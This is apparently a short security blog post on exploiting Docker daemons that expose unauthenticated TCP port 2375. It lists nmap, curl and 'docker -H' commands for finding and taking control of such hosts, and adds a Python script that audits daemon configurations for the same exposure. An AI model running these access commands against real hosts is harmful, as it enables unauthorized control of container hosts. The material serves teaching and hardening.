Exploiting docker misconfiguration

In this blog post, I will show how Docker containers can be attacked through a Docker misconfiguration, using the Docker client's host option (-H) to reach the containers.

When the Docker daemon is set up to listen on a TCP socket, the default setup provides unencrypted and unauthenticated direct access to the daemon. By convention, port 2375 is used for unencrypted and port 2376 for encrypted communication with the daemon.

  • Scan ports 2375 and 2376 using Nmap
nmap -p 2375,2376 -n 192.168.56.4 -v
  • We can query the Docker API using curl
curl 192.168.29.24:2375/images/json
  • An attacker can abuse this by pointing the Docker client's host option at the exposed daemon to access the host system's Docker runtime

docker -H tcp://ip:2375 ps

docker -H tcp://ip:2375 images

Now, we have full privilege over the host system :)
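To check your own hosts for the exposure described above, here is an added example (not part of the original post or of Docker itself) that audits a daemon.json and a dockerd command line for TCP listeners without TLS or client certificate verification. The function names, sample configurations and certificate paths are constructed for illustration; the `hosts`, `tls` and `tlsverify` options and the `-H`/`--host` flags are the daemon's own.

```python
import json
from urllib.parse import urlsplit

LOOPBACK = {"127.0.0.1", "localhost", "::1"}

# Constructed sample daemon.json contents (not taken from the post).
WEAK = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'
HARDENED = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
    "tlsverify": True,                       # require a client certificate
    "tlscacert": "/etc/docker/pki/ca.pem",   # constructed paths
    "tlscert": "/etc/docker/pki/server.pem",
    "tlskey": "/etc/docker/pki/server-key.pem",
})

def tcp_listeners(config, argv):
    """tcp:// listeners from daemon.json "hosts" and dockerd -H/--host flags."""
    hosts = list(config.get("hosts", []))
    for i, arg in enumerate(argv):
        if arg in ("-H", "--host") and i + 1 < len(argv):
            hosts.append(argv[i + 1])
        elif arg.startswith("--host="):
            hosts.append(arg.split("=", 1)[1])
    return [h for h in hosts if h.startswith("tcp://")]

def enabled(name, config, argv):
    """True if a boolean option is set in daemon.json or on the command line."""
    return config.get(name) is True or f"--{name}" in argv or f"--{name}=true" in argv

def audit(config_text, argv=()):
    """Return one finding per TCP listener that lacks TLS or client verification."""
    config = json.loads(config_text or "{}")
    tlsverify = enabled("tlsverify", config, argv)
    tls = tlsverify or enabled("tls", config, argv)
    findings = []
    for host in tcp_listeners(config, argv):
        scope = "loopback only" if urlsplit(host).hostname in LOOPBACK else "network reachable"
        if not tls:
            findings.append(f"CRITICAL {host} ({scope}): no TLS, no client authentication")
        elif not tlsverify:
            findings.append(f"HIGH {host} ({scope}): TLS without client certificate verification")
    return findings

if __name__ == "__main__":
    for name, text in (("weak", WEAK), ("hardened", HARDENED)):
        print(name, audit(text) or "no exposed TCP listener findings")
```

A TLS-only listener (tls without tlsverify) is still reported, because it encrypts traffic but accepts any client.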

You can read more about exploiting Docker here.

This is a short and simple blog post, made possible by following the procedure described in the blog mentioned above, written by Madhu.


THE HOW TO BLOG |Siddhanth Dwivedi

Siddhanth Dwivedi | Senior Security Engineer & AWS Community Builder 👨🏾‍💻